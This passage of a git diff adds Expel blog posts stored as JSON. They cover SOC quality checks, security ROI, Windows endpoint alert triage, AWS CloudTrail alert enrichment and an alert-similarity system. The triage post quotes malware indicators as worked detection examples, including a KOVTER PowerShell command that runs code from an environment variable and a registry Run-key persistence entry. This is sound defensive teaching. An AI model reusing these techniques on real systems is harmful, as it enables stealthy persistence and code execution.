Run the QC process every 24 hours. Steal this mental model: Expel SOC QC mental model And remember: you don\u2019t have to trade quality for efficiency. We hope this post was helpful. We wrote this post because this is something that would have really helped us when we started down the path of measuring SOC quality. We\u2019d love to hear about your quality program. What works? What didn\u2019t? Success stories? We\u2019re always on the lookout for ways to improve. Download Expel\u2019s SOC QC checklist" +} \ No newline at end of file diff --git a/how-to-quantify-security-roi-for-real.json b/how-to-quantify-security-roi-for-real.json new file mode 100644 index 0000000000000000000000000000000000000000..1178d0cce6dea64784f2ea1c4f4fde95abbf0ce1 --- /dev/null +++ b/how-to-quantify-security-roi-for-real.json @@ -0,0 +1,6 @@ +{ + "title": "How to quantify security ROI... for real", + "url": "https://expel.com/blog/how-to-quantify-security-roi-for-real/", + "date": "May 10, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How to quantify security ROI\u2026 for real Expel insider \u00b7 2 MIN READ \u00b7 GREG NOTCH \u00b7 MAY 10, 2022 \u00b7 TAGS: Company news / MDR When it comes to security, pressure from the board comes from all sides. They are increasingly concerned that cybersecurity is in proper focus. \u201cAre we secure now?\u201d \u201cWill we be later?\u201d \u201cAre we making the right investments to address our cybersecurity risk?\u201d And the big one: \u201cwhat\u2019s all this costing now and in the future?\u201d The fact is, you need to spend money to help secure your org. But spending creates additional questions. One of the biggest: how can you be at least \u201creasonably sure\u201d the investment will pay off and isn\u2019t a complete waste of time, effort, and money? The \u201cusual way\u201d of calculating cybersecurity return on investment (ROI)? You take the average cost of an incident and multiply that by how many incidents you are likely to have in a given timeframe. So if you\u2019ve got rough costs for a new technology, you can assess whether the price of it and the reduction in incidents it brings is worth the investment. To us, this sounds like a \u201cnot enough data\u201d guess. Why? There are many more factors that come into play \u2014 starting with how to measure how much a technology actually reduces the organization\u2019s risk \u2014 which makes calculating cybersecurity ROI like nailing Jello to a tree. Some things to think about: What tech do you already have that needs to communicate with the new one? How big of a lift is it to make that happen? Are you shelving a legacy product or disentangling yourself from a current tech relationship and starting a new one? What\u2019s the lift there? Your equation also must include issues at stake beyond \u201cjust money,\u201d including the potential loss of intellectual property, loss of reputation, and the disruptions to your business. You know that breaches are expensive. It\u2019s time to \u201cguess\u201d better. Think about calculating cybersecurity ROI as the start of a conversation about whether investing upfront to help prevent a big disruption outweighs the small probability of a significant breach and its ensuing costs. Arming yourself with as much data as possible (technology research) is the best way to start. Expel has a few resources, including the recently commissioned Forrester Total Economic Impact\u2122 (TEI) of Expel . 
This study was conducted by Forrester Consulting, a third-party research group, on behalf of Expel to help potential buyers calculate Expel\u2019s financial impact on their orgs. Through an extensive customer interview process, Forrester found that Expel customers could get a 610% return on investment (ROI) \u2014 helping them lower costs significantly and providing qualitative benefits like greater efficiency and better quality of life. Wait \u2026 our customers\u2019 cost savings are excellent and we provide other meaningful benefits \u2014 like giving them peace of mind? To say we\u2019re ecstatic to see a measurable impact on our customers\u2019 lives is an understatement. But what about ROI specifically for your org? Fair question. We\u2019ve got just the tool. We\u2019re excited to introduce our interactive ROI calculator , which gives you an estimate on your ROI if you were to choose Expel as your managed security provider. Bonus, you don\u2019t have to talk to a human first. (Although the humans here at Expel are always happy to chat .)" +} \ No newline at end of file diff --git a/how-to-triage-windows-endpoints-by-asking-the-right.json b/how-to-triage-windows-endpoints-by-asking-the-right.json new file mode 100644 index 0000000000000000000000000000000000000000..243c2012f5bd8c89f418c9c9dd44169df75f3f76 --- /dev/null +++ b/how-to-triage-windows-endpoints-by-asking-the-right.json @@ -0,0 +1,6 @@ +{ + "title": "How to triage Windows endpoints by asking the right ...", + "url": "https://expel.com/blog/triage-windows-endpoints-asking-right-questions/", + "date": "Aug 24, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG How to triage Windows endpoints by asking the right questions Tips \u00b7 7 MIN READ \u00b7 GRANT OVIATT \u00b7 AUG 24, 2017 \u00b7 TAGS: Get technical / How to Mindset over matter. As security practitioners, it\u2019s important to remember that alerts are only the beginning, not the end, of finding evil. Alerts are simply investigative leads, not security answers. To determine if they have merit, you have to interrogate them. But without a strong process, the wealth of forensic information on the endpoint can easily overwhelm an investigator or lead them astray. In this blog post, I\u2019ll explain the three parts of this investigative mindset and show you how to apply them when you triage endpoint alerts. 1. Know your indicators The first question you should ask is a little obvious but it\u2019s often overlooked: what triggered the alert? As an investigator, if you can\u2019t answer that, you\u2019re going in with your eyes closed and you run the risk (or rather likelihood) that you\u2019re not going to select the right forensic artifacts. Even worse, there\u2019s a good chance you\u2019ll draw the wrong conclusions from the artifacts you do select. One way to get the investigation off on the right foot is to create playbooks that recommend what the initial investigative step is to validate each type of detection.They should contain any IOCs (indicators of compromise) that are a part of the detection along with references to their source (whitepapers, tweets, etc.) or other related alerts. This gives analysts quick context to research the detections they encounter. Don\u2019t have a threat intel team? Or maybe your security products don\u2019t give you any explanation when they throw an alert at you. That\u2019s OK. There\u2019s plenty of open source intelligence out there. 
Often a quick Google search or VirusTotal lookup for interesting file names, registry keys, or hashes can provide some context to guide your next steps. But remember, context does not equal conclusions. Intelligence should only be used to guide your line of questioning. Be wary of making conclusions based solely on your search results. 2. Ask the right questions I often find that inexperienced analysts pull back the same sources of evidence, regardless of their investigative lead. Usually, it\u2019s because there\u2019s no process to guide the way they triage an alert and ensure they get a complete picture. Are you sans process? If so, I\u2019ve summarized the process I use below by distilling it down into a few questions investigators can use to triage an alert, along with evidence sources that can help answer each question. Keep in mind, though, that the list of forensic evidence is in no way comprehensive. Q: How did it get here? Determine what took place that allowed initial access to the system (but note it\u2019s not always possible to answer this). Evidence sources: Web browsing history/downloads IIS logs Service Control Manager Event Logs (EID 7045 \u2013 Service Install) Windows Security Logs (EID 4648 \u2013 Explicit logon attempt) USB Artifacts (USBSTOR, MountPoints2, MountedDevices registry keys or setupapi.log) Phishing Artifacts ( RecentDocs and TrustedRecords registry keys and Jumplists ) Q: What does it do? Figure out what the malware\u2019s host and network capabilities are including how it maintains persistence. This usually involves recovering a sample, performing some static/dynamic analysis, and/or uploading a sample to a sandbox. Evidence sources: File acquisition Directory listings Acquire AV logs Acquire process memory Active network connections (netstat) Registry AutoRuns PowerShell Operational logs Q: Did it execute? If you\u2019ve answered the previous question you know what the malware could do. The goal here is to see if the malware actually executed. This involves looking at execution artifacts for evidence that a particular binary launched, and searching for dropped files, registry keys created, and related evidence that would indicate the malware performed actions successfully on the system. Evidence sources: Windows Prefetch Application Compatibility Cache (Shimcache) Amcache.hve RecentFileCache.bcf Registry AutoRuns WMI RecentlyUsedApps (RUA) Q: Is it active? If you learn that the malware executed, the next step is to determine if the threat is still present and running regularly on the system. Evidence sources: Process listings Active network connections (netstat) DNS Cache Windows Prefetch Answering these four investigative questions should be your objectives when you triage an alert. You may not be able to get good answers for all of them \u2014 for example, determining how a piece of malware was created on a host may be impossible if it was created years ago and the forensic evidence is limited. However, you\u2019ll find that the answers you do get will quickly lead you to conclusions, and the story you can tell will be more comprehensive. 3. Understand your investigative footing Not all alerts are equal. Depending on where the evidence came from \u2014 a file, registry key, process event or log \u2014 an analyst will have significantly different investigative perspectives. 
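Before walking through those examples, here's a tiny sketch of what turning one "Did it execute?" source into a quick check might look like, assuming you can reach the Prefetch directory through your EDR or a live-response session. The helper is illustrative, and an empty result is not proof the binary never ran (Prefetch can be disabled or entries aged out).

```python
from pathlib import Path

def prefetch_hits(binary_name, prefetch_dir=r"C:\Windows\Prefetch"):
    """List Prefetch files referencing a binary, e.g. BADBINARY.EXE-1A2B3C4D.pf."""
    pattern = f"{binary_name.upper()}-*.pf"
    return sorted(p.name for p in Path(prefetch_dir).glob(pattern))
```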
To illustrate, let\u2019s use the investigative questions I outlined above to show how your perspective changes with each evidence source, and how it should steer your forensic questioning. Source #1: File Surprisingly, the presence of a file doesn\u2019t necessarily provide a strong investigative footing. While a strange binary on a host should certainly raise suspicions, it may not have executed. Before you retrieve artifacts from the host, consult any playbooks or intelligence about the detection itself to answer the question \u201cWhat does it do?\u201d. Knowing what files the malware drops and how it maintains persistence will guide the evidence an investigator seeks out to validate the threat. If available in the alert, use the NTFS timestamps for the file to establish a time window of potential activity. Below is a sample file detection using the approach I outlined above. Example from intel sourced from: https://www.us-cert.gov/ncas/alerts/TA17-117A Investigative Lead: FILE DETECTION: REDLEAVES File Name: VeetlePlayer.exe File Path: C:Program FilesWindows MediaVeetlePlayer.exe Created: 1 day ago MD5: 9d0da088d2bb135611b5450554c99672 File Size: 25704 bytes File Description: Veetle TV Player Signed: True Off the bat we don\u2019t know much about this, based on the alert alone. An inexperienced analyst might be inclined to simply acquire the file. But in this case, that would lead to unfruitful results. By looking at the intel for the REDLEAVES RAT provided by the US Cert, we see that \u201cVeetlePlayer.exe\u201d is a legitimate binary that uses search-order hijacking to import a malicious loader DLL. This DLL then loads encoded shellcode contained in a file into memory. If an investigator simply acquired the legitimate executable, investigators would have come to the entirely wrong conclusion. Here is how I\u2019d interrogate the evidence in this context: Q: How did it get here? Based on the recent creation time, we may be able to trace the initial compromise vector. Look for any suspicious logon activity prior to Windows service installation for evidence of lateral movement. Also check evidence relating to phishing documents, like RecentDocs registry keys or Jumplists. Q: What does it do? Using our understanding of how REDLEAVES behaves based on our existing intelligence, the next step is to validate that this is REDLEAVES. I\u2019d validate the threat by performing a directory listing of \u201cC:Program FilesWindows Media\u201d and look for the presence of the malicious DLL (unsigned) and the shellcode file. Also, pull a Registry AutoRuns listing to see if the binary has been made persistent. Q: Did it execute? On a workstation, pull Windows Application Compatibility Cache and Prefetch. This will help identify if and when \u201cVeetlePlayer.exe\u201d has executed on the host. Q: Is it active? Based on the recent creation time, I\u2019d expect this backdoor is likely active in memory. To check, I\u2019d pull a process listing with network connection and the DNS cache on the host to validate. Source #2: Registry Registry alerts indicate that something has happened. Registry keys don\u2019t create themselves. So, if you\u2019re looking at an obscure key that a malware family uses, it\u2019s likely the host was infected at some point. While registry detections answer, \u201cDid it execute?\u201d, they often leave you with less of a grasp on \u201cWhat does it do?\u201d because you\u2019re left without binary metadata. 
Below is an example of how I\u2019d apply the investigative mindset to a registry detection. Example from intel sourced from: https://www.us-cert.gov/ncas/alerts/TA14-212A Investigative Lead: REGISTRY DETECTION: BACKOFF Registry Key: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun Registry Value: Windows NT Service Registry Data: %APPDATA%AdobeFlashPlayermswinhost.exe Last Modified: 30 days ago From the registry detection we know that something executed to create this registry key. Now, we need to figure out if the referenced binary is evil and what it can do. By looking at the information provided by the US Cert, we can see that this detection is intended for PoS malware that creates two output files within the directory \u201c%APPDATA%AdobeFlashPlayer\u201d. Given this information, here\u2019s how I would proceed with my questioning. Q: How did it get here? Evidence for this may be scarce based on the last modified time of the registry key. I\u2019d look for Windows logon events around the last modified time of the registry key, specifically relating to Remote Desktop solutions based on the threat briefing. Q: What does it do? To figure this out, I\u2019d acquire the referenced binary \u201c%APPDATA%AdobeFlashPlayermswinhost.exe\u201d to see if it\u2019s still present on the host along with a directory listing of \u201c%APPDATA%AdobeFlashPlayer\u201d to validate whether output files have been created on the host. Q: Did it execute? A registry run key has been created, so we know something has executed on the host. Q: Is it active? I\u2019d run a process listing with network connections and retrieve the host DNS cache to look for signs of current activity. Based on the last modification of the registry key, understand that this could be a long shot. Source #3: Process Process alerts put investigators on a relatively strong investigative footing. A process event tells you both that a binary has executed and that it\u2019s active. Plus, you get metadata about the binary. Again, before you retrieve artifacts from the host, make sure to consult any playbooks or intelligence containing information about the detection itself so you can better answer \u201cWhat does it do?\u201d and refine your line of forensic questioning. Below is an example of what that would look like. Example can be found at: https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/ Investigative Lead: PROCESS DETECTION: KOVTER Process Name: powershell.exe Process Arguments: C:WindowsSystem32WindowsPowerShellv1.0powershell.exe iex $env:ksktr Parent Process Name: mshta.exe Process MD5: 097CE5761C89434367598B34FE32893B User: CORPAlice Start Time: 30 minutes ago Open source research tells us that KOVTER is \u201cfileless\u201d commodity malware that uses environment variables and registry data to store script interpreter commands that contain embedded shellcode. Given this information, here\u2019s how I would proceed with my questioning. Q: How did it get here? Pull web history for the user \u201cAlice\u201d, along with artifacts related to any phishing attempts. Q: What does it do? We have a general understanding of what it might do from the open source intel. So let\u2019s pull the registry key, HKLMSystemCurrentControlSetControlSession ManagerEnvironment, containing system environment variables to see where variable \u201cksktr\u201d could be storing powershell commands. Also I\u2019d look at Registry AutoRuns to validate that persistence is still intact. Q: Did it execute? This one\u2019s easy. 
If it\u2019s a process event, that means the binary is running in memory\u2013 so it must have executed. Q: Is it active? This one\u2019s also easy. If it\u2019s a process event, that means the binary is running in memory \u2014 so it must be active. I\u2019d check network connections for additional evidence. \u2014 Remember folks, detection is only half the battle. Good investigators are separated from great ones by the questions they ask. Hopefully this post has encouraged you to think about your own investigative mindset when you approach alerts. The key is to understand that all alerts are not made equal. Each provides unique investigative context. And by consulting intel resources before you extract forensic artifacts you\u2019ll develop a more efficient line of questioning." +} \ No newline at end of file diff --git a/how-we-automated-enrichments-for-aws-alerts.json b/how-we-automated-enrichments-for-aws-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..688e534f382b5bddddd45c59c119783c7f6c9fde --- /dev/null +++ b/how-we-automated-enrichments-for-aws-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "how we automated enrichments for AWS alerts", + "url": "https://expel.com/blog/power-of-orchestration-how-we-automated-enrichments-aws-alerts/", + "date": "Aug 18, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The power of orchestration: how we automated enrichments for AWS alerts Engineering \u00b7 8 MIN READ \u00b7 BRITTON MANAHAN \u00b7 AUG 18, 2020 \u00b7 TAGS: Alert / Cloud security / Framework / Get technical / Managed security If you\u2019ve read a post or two here on our EXE Blog, it shouldn\u2019t come as a surprise that we\u2019re big on automation. That\u2019s because we want to help analysts more efficiently, quickly and accurately determine if an alert requires additional investigation. Automating repetitive tasks not only establishes standards, it also removes the monotony and cognitive load in the decision making process. And we have the data to back that up. (Check out our blog post about how we used automation to improve the median time it takes to investigate and report suspicious login activity by 75 percent.) Understanding why we do it might be easy. But what about how we do it? Let\u2019s dive into that. We never automate until we fully understand the manual process. We do that through the Expel Workbench , which records all the activities an analyst undertakes when investigating an alert. We can inspect these activities, looking for common patterns and bring a data-driven focus to our automation. Follow @cyberpug010 In this post, we\u2019ll dig into how we automated enrichments for Amazon Web Services (AWS) alerts. Fun fact: this was the first task I was given when I started working at Expel. (Hey, I\u2019m Britton, a senior detection and response analyst here at Expel.) We\u2019ll explore the logic deployed by our automated IAM AWS enrichments. Also, I\u2019ll share our approach to developing AWS enrichments and the implementation of the enrichment workflow process. You\u2019ll walk away with some insights into particular AWS intricacies and how you can implement your own AWS enrichments. Automating AWS IAM enrichments When we create these new enrichments, we need to first define the questions that the associated user will need to ask when determining if an AWS alert is worthy of additional investigation. Here are the questions we came up with: If the alert was generated from an assumed role, who assumed it? 
Did the source user assume any roles around the time of the alert? What AWS services has the user historically interacted with? Has the user performed any interesting activities recently? Has this activity happened for this user before? All of these questions can be answered by investigating CloudTrail logs, which maintain a historical record of actions taken in an AWS account. Expel collects, stores and indexes most CloudTrail logs for our AWS customers to support custom AWS alerting and have them readily available for querying to aid in triage and investigations. Note that we also collect, store and index GuardDuty logs for generating Expel alerts. These questions all feed into an enrichment workflow (see the downloadable diagram at the end of this post) that helps our team make quick and smart decisions when it comes to triaging alerts. You\u2019ll notice that this workflow supports AWS alerts for either CloudTrail or GuardDuty logs. Now I\u2019ll walk you through how we approach answering each of these questions and share my thoughts on what you should keep in mind when creating each enrichment. If the alert IAM entity is an assumed role, what\u2019s the assuming IAM entity? If an AWS alert was generated by an assumed role, it\u2019s important to know the IAM principal that assumed it (yes, role-chaining is a thing) and any relevant details related to the role assumption activity. In the life cycle of an AWS compromise, a threat actor may gain access to and use several IAM users and roles. Roles are used in AWS to delegate and separate permissions and help support a least privilege security model. A threat actor\u2019s access might begin with an initial user that is used to assume roles and execute privilege escalation in order to gain access to additional users and roles. It\u2019s critical, but not always simple, to know the full scope of IAM entities wielded by an attacker. For command-line, software development kit (SDK) and SwitchRole activity in the Console, we can answer this question with the userIdentity section of CloudTrail logs which contain the IAM principal making the call, including the access key used. When a role is assumed in AWS, temporary security credentials are granted in order to take on the role\u2019s access permissions. CloudTrail logs generated from additional calls using the temporary credentials (the assumed role instance) will include this access key ID in the user identity section. This allows us to link any actions taken by a particular assumed role instance and resolve the assuming IAM entity. The latter is done by finding the matching accessKeyId attribute in the responseElements section of the corresponding AssumeRole CloudTrail event log. It\u2019ll look something like this: Matching AccessKeyId activity to its corresponding AssumeRole Event Not so fast \u2013 there\u2019s other use cases While it would be great if this was all the logic required, there\u2019s an additional use case for roles that needs to be considered: AWS SSO. Federated users are able to assume roles assigned to them by their identity provider. This federated access system also provides the ability for federated users to login to the AWS Console as an assumed role . We often see assumed roles as the user identity for ConsoleLogin events when SSO is configured through SAML 2.0 Federation, but it can be performed using any of the AssumeRole* operations to support different federated access use-cases. 
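For the non-federated case, the matching logic sketched above boils down to something like this (assuming CloudTrail records already parsed into Python dicts; the helper is illustrative, not Ruxie's actual code):

```python
def find_assume_role_event(alert_event, assume_role_events):
    """Link an assumed-role alert back to the AssumeRole call that issued its keys."""
    access_key = alert_event.get("userIdentity", {}).get("accessKeyId")
    for event in assume_role_events:
        creds = (event.get("responseElements") or {}).get("credentials", {})
        if creds.get("accessKeyId") == access_key:
            return event  # userIdentity on this event is the assuming IAM principal
    return None
```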
The following diagram provides a high-level summary of the steps involved in this process: AssumeRoleWithSAML console login process The reason this process is significant is that actions taken by the assumed role in the console will use a different access key than the one in the associated AssumeRoleWithSAML event. Despite this, the corresponding AssumeRole event for this type of federated assumed role activity can still be located. Evaluating returned events Following the logic shared in the AWS blog post, \u201c How to Easily Identify Your Federated Users by Using AWS CloudTrail ,\u201d all recent AssumeRole* (that * is a wildcard) events for the role with a matching role session name are collected. The returned events are then evaluated in the following order to determine the corresponding AssumeRole* log, with the matching logic provided to the user for clarity: If one is available in the Alert source log, is there an event matching the access key ID? If one is available in the Alert source log, is there an event time matching the session context creationdate? If there is not a match for an access key ID or session creationdate, then use the most recent AssumeRole* event returned by the query. This is what we see in the Expel Workbench: Assumed role atep back enrichment output By the way, the robot referenced here is Ruxie . Did the alert IAM entity assume any roles? By including both successful and failed role assumptions, we can also see any brute force attempts to enumerate roles a user has access to. The status message of a failed AssumeRole event is used to determine the target role when a call to AssumeRole failed. Failed AssumeRole errorMessage Assumed roles enrichment output Why do we ask this question? Because it gives analysts insight into any suspicious activity involving role assumption. Determining how the role was assumed Determining how the IAM role was assumed can be a valuable piece of context to have in combination with the provided role ARN, result, count and firstlast timestamps. There are a few ways a role is typically assumed: SAML/Web identity integration AWS web console AWS native services CLI / SDK The logic is conducted in the following steps: SAML or WebFederation through the API event name (AssumeRoleWithSAML and AssumeRoleWithWebIdentity) The Web Console by looking the invoked by field (AWS Internal), source ip and UserAgent An AWS Service by looking at the invoked by field If none of the first three criteria were matches, then the interface is determined to be the AWS CLI or SDK In order to support successful and failed calls, recent AssumeRole* events are collected for the user associated with the alert regardless of authentication status code. The query used to gather AssumeRole* events for this enrichment will vary slightly depending on whether the source alert user is an IAM user or assumed role. Keep in mind that this particular workflow is also \u201crole aware.\u201d This means that additional logic is applied when gathering relevant IAM activity. When looking at AWS alerts based on an IAM user, we surface other relevant IAM activity that matches the IAM identifier. For IAM roles, we apply a filter to include roles where the session name or source IP matches what we saw in the alert. Given that roles in AWS can be assumed by multiple entities, this additional filter helps ensure that relevant results are being retrieved. What services has the alert IAM entity interacted with? 
Answering this question provides Expel analysts with a high level summary of the AWS services the IAM entity has interacted with in the past week. With over 200 services and counting, this enrichment helps provide information about both the type of activity the IAM entity is involved in and at what frequency. This enrichment isn\u2019t intended to act as a singular decision point, but rather help provide a simple summary of what services are in scope for the IAM entity in terms of actual interaction. When an alert moves into an investigation for a deeper dive, it also provides information on AWS services that the IAM recently interacted with that would be highly valuable for a potential attacker (EC2, IAM, S3, SSM, database services, lambda, Secrets Manager and others). Additional context applied in tandem with this enrichment can help us gather more insights, like an account used by automation deviating from the normally used services. To determine what services a user interacted with, all of the principal\u2019s CloudTrail events over the previous week are queried. The total of each unique value is calculated to determine counts for each AWS service the alert user interacted with. Interacted services enrichment output Has the alert IAM entity made any recent interesting API calls? We define interesting API calls to be any AWS ApiEvent that doesn\u2019t have a prefix of Get (excluding GetPasswordData), List, Head or Describe, or have a failed event status. Having details on these types of activities is critical in determining if an alert is a true positive. After a threat actor gains access into an AWS account, they\u2019re likely going to perform modifying API calls related to persistence, privilege escalation and data access. Some prime examples of modifying calls are AuthorizeSecurityGroupIngress, CreateKeyPair, CreateFunction, CreateSnapshot and UpdateAssumeRolePolicy. In our recent blog post , we noted the highly suspicious output provided by this enrichment: Expel Workbench alert example While API calls that return AWS information, such as DescribeInstances, are going to be important when scoping recon activity for established unauthorized access, they\u2019re extremely common for most IAM entities. However, we do include them by capturing any failed API calls when we observe a high number of unauthorized access, notably when it\u2019s first gained for an IAM entity and a threat actor is unfamiliar with its permissions. They may be attempting to browse to different services in the console or running automated recon across services that they don\u2019t have required permissions. How does the alert activity align with historical usage for the IAM entity? Lastly, we need to evaluate whether this activity is normal for this IAM entity. To answer this question, we first need to decide on the window of time that makes up \u201cnormal activity.\u201d We found that going back two weeks, while skipping the last 12-hours of CloudTrail activity, provides a sufficient historical view while also reducing the likelihood that we show our analysts data tainted by the recent activity related to the alert. Within the window of time we lift all API calls for the user in question along with their associated user agents and IP addresses across the two weeks. This is when we look to CloudTrail. We pull out activity from CloudTrail that matches an ARN or principal ID, we use different logic for assumed rules which we previously discussed. 
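A rough illustration of the two enrichments above follows; the eventName, errorCode and eventSource fields are standard CloudTrail, while the filter itself and the last_week_events variable are illustrative.

```python
from collections import Counter

READ_ONLY_PREFIXES = ("Get", "List", "Head", "Describe")

def is_interesting(event):
    """Modifying or failed API calls, per the definition above."""
    name = event.get("eventName", "")
    failed = "errorCode" in event  # failed calls are always worth surfacing
    read_only = name.startswith(READ_ONLY_PREFIXES) and name != "GetPasswordData"
    return failed or not read_only

# last_week_events: the IAM entity's CloudTrail events from the past week
# services    = Counter(e["eventSource"].split(".")[0] for e in last_week_events)
# interesting = [e for e in last_week_events if is_interesting(e)]
```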
In order to summarize this data and compare the access attributes, we slice and dice it into the following views: How many times has the IAM entity made this API call from the same IP and user-agent? (GuardDuty based alerts will be compared on the IP only because they do not contain user agent details.) What IPs and user-agent has this IAM entity historically called this API with? What IPs and user-agent has this IAM entity historically used in all of its API calls? The data comes out looking like this in our Expel Workbench: This powerful enrichment allows our analysts to quickly understand if this activity for an IAM entity is common and how they interact with AWS services. User-agents associated provide useful insights if certain service interactions for an IAM entity are typically console based, via the AWS CLI or with a certain type of AWS SDK. While a threat actor can easily spoof user-agents, aligning unauthorized access with an IAM entity\u2019s historical activity is a much tougher task. Parting thoughts and a resource for you Rather than having analysts repeatedly perform tedious tasks for each AWS alert, these enrichments empower their decision making while simultaneously establishing standardization. The enrichment outputs work in tandem to provide a summary of both relevant recent and historical activity associated with the IAM entity to answer key questions in the AWS alert triage process. Below is the workflow I walked you through in this post. Feel free to use it as a resource when assessing how CloudTrail logs can help automate AWS alert enrichments in your own environment. If you have questions, reach out to me on Twitter or contact us here . We\u2019d love to chat with you about AWS security." +} \ No newline at end of file diff --git a/how-we-built-it-alert-similarity.json b/how-we-built-it-alert-similarity.json new file mode 100644 index 0000000000000000000000000000000000000000..c04c8e595f2a8d3dff6909d0ab4f2e4279adda11 --- /dev/null +++ b/how-we-built-it-alert-similarity.json @@ -0,0 +1,6 @@ +{ + "title": "How we built it: Alert Similarity", + "url": "https://expel.com/blog/how-we-built-it-alert-similarity/", + "date": "Aug 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How we built it: Alert Similarity Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 AUG 15, 2022 \u00b7 TAGS: Tech tools TL;DR Our Alert Similarity tool lets us teach our bots to compare similar \u201cdocuments\u201d and suggest or recommend a next step, freeing up our analysts. Here\u2019s a walk-through of how we developed it. In this post, Dan Whalen and Peter Silberman walk you through how we developed it. Hint: the process begins with an informed hunch and ends with analysts freed up to do more of what analysts do best. Since the beginning of our journey here at Expel, we\u2019ve invested in creating processes and tech that set us up for success as we grow \u2013 meaning we keep our analysts engaged (and help them avoid burnout as best we can) while maintaining the level of service our customers have come to expect from us. One of the features we recently built and released helps us do all of this: Alert Similarity. Why did we build it and how does it benefit our analysts and customers? Here\u2019s a detailed look at how we approached the creation of Alert Similarity. 
If you\u2019re interested in trying to develop a similar feature for your own security operations center (SOC), or learning about how to bring research to production, then read on for tips and advice. Getting started In our experience, it\u2019s best to kick off with some research and experimentation \u2013 this is an easy way to get going and start identifying low-hanging fruit, as well as to find opportunities to make an impact without it being a massive undertaking. We began our Alert Similarity journey by using one of our favorite research tools: a Jupyter notebook. The first task was to validate our hypothesis: we had a strong suspicion that new security alerts are similar to others we\u2019ve seen in the past. To test the theory, we designed an experiment in a Jupyter notebook where we: Gathered a representative sample set of alerts; Created vector embeddings for these alerts; Generated an n:n similarity matrix comparing all alerts; and Examined the results to see if our hypothesis held up. We then gathered a sample of alerts over a few months (approximately 40,000 in total). This was a relatively easy task, as our platform stores security alerts and we have simple mechanisms in place to retrieve them regularly. Next, we needed to decide how to create vector embeddings. For the purposes of testing our hypothesis, we decided we didn\u2019t need to spend a ton of time perfecting how we did it. If you\u2019re familiar with generating embeddings, you\u2019ll know this usually turns into a never-ending process of improvement. To start, we just needed a baseline to measure our efforts against. To that end, we chose MinHash as a quick and easy way to turn our selected alerts into vector embeddings. What is MinHash and how does it work? MinHash is an efficient way to approximate the Jaccard Index between documents. The basic principle is that the more data shared between two documents, the more similar they are. Makes sense, right? Calculating the true Jaccard index between two documents is a simple process that looks like this: Jaccard Index = (Intersection of tokens between both documents) / (Union of tokens between both documents) For example, if we have two documents: The lazy dog jumped over the quick brown fox The quick hare jumped over the lazy dog We could calculate the Jaccard index like this: (the, lazy, dog, jumped, over, quick) / (the, lazy, dog, jumped, over, quick, brown, fox, hare) \u2192 6 / 9 \u2192 0.667 This is simple and intuitive, but at scale it presents a problem: you have to store all tokens for all documents to calculate this distance metric. In order to calculate the result, you inevitably end up using lots of storage space, memory, and CPU. That\u2019s where MinHash comes in. It solves the problem by approximating Jaccard similarity, yet only requires that you store a vector embedding of length K for each document. The larger K, the more accurate your approximation will be. By transforming our input documents (alerts) into MinHash vector embeddings, we\u2019re able to efficiently store and query against millions of alerts. This approach allows us to take any alert and ask, \u201cWhat other alerts look similar to this one?\u201d Similar documents are likely good candidates for further inspection. Validating our hypothesis Once we settled on our vectorization approach (thanks, MinHash!), we tested our hypothesis. By calculating the similarity between all alerts for a specific time period, we confirmed that 5-6% of alerts had similar neighbors (Fig 2.). 
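If you want to try the MinHash idea yourself, here's a toy version using the open-source datasketch library; the library choice is purely for illustration and isn't a statement about what runs in our pipeline.

```python
from datasketch import MinHash  # pip install datasketch

def signature(tokens, num_perm=128):  # num_perm is the K discussed above
    m = MinHash(num_perm=num_perm)
    for t in tokens:
        m.update(t.encode("utf8"))
    return m

a = signature("the lazy dog jumped over the quick brown fox".split())
b = signature("the quick hare jumped over the lazy dog".split())

print(a.jaccard(b))  # approximates the true Jaccard index of roughly 0.67
```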
Taking that even further, our metrics allowed us to estimate actual time savings for our analysts (Fig 3.). Fig. 2: Percentage of alerts with similar neighbors Fig 3. Estimated analyst hours saved (extrapolated) These metrics proved that we were onto something. Based on these results, we chose building an Alert Suggestion capability off the back of Alert Similarity as our first use case to target. This use case would allow us to improve efficiencies in our SOC and, in turn, enhance the level of service we provide to our customers. Our journey to production Step 1: Getting buy-in across the organization Before moving full speed ahead into our project, we communicated our research idea and its potential benefits across the business. The TL;DR here? You can\u2019t get your colleagues to buy into a new idea unless they understand it. Our R&D groups pride themselves on never creating \u201cTad-dah! It\u2019s in production!\u201d moments for Engineering or Product Management without them having the background on new projects first. We created a presentation that outlined the opportunity and our research, and allowed Expletives (anyone from Product Management to Customer Success to Engineering) to review our proof of concept. In this case, we used a heavily documented notebook to walk viewers through what we did. We discussed our go-forward plan and made sure our peers across the organization understood the opportunity and were invested in our vision. Step 2: Reviewing the design Next, we created a design review document outlining a high-level design of what we wanted to build. This is a standard process at Expel and is an important part of any new project. This document doesn\u2019t need to be a perfect representation of what you\u2019ll end up building, nor does it need to include every last implementation detail, but it does need to give the audience an idea of the problem you\u2019re aiming to solve and the general architectural design of the solution you\u2019re proposing. Here\u2019s a quick look at the design we mocked up to guide our project: As part of this planning process, we identified the following goals and let those inform our design: Build new similarity-powered features with little friction Monitor the performance and accuracy of the system Limit complexity wherever possible (don\u2019t reinvent the wheel) Avoid making the feature availability mission critical (so we can move quickly without risk) As a result of this planning exercise, we concluded that we needed to build the following components: Arnie (Artifact Normalization and Intelligent Encoding): A shared library to turn documents at Expel into vector embeddings Vectorizor consumer: A worker that consumes raw documents and produces vector embeddings Similarity API: A grpc service that provides an interface to search for similar documents We also decided that we wouldn\u2019t build our own vector search database and instead decided to use Pinecone.io to meet this need. This was a crucial decision that saved us a great deal of time and effort. (Remember how we said we wouldn\u2019t reinvent the wheel?) Why Pinecone? At this stage, we had a good sense for our technical requirements. We wanted sub-second vector search across millions of alerts, an API interface that abstracts away the complexity, and we didn\u2019t want to have to worry about database architecture or maintenance. As we examined our options, Pinecone quicky became our preferred partner. 
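To make the store-and-query flow more concrete, a stripped-down sketch might look like the code below. It assumes the pinecone-client Python package (method names vary across client versions) and a hypothetical index named alerts, so treat it as the shape of the idea rather than our production service.

```python
import pinecone  # assumption: the v2-era pinecone-client API

pinecone.init(api_key="...", environment="us-east1-gcp")
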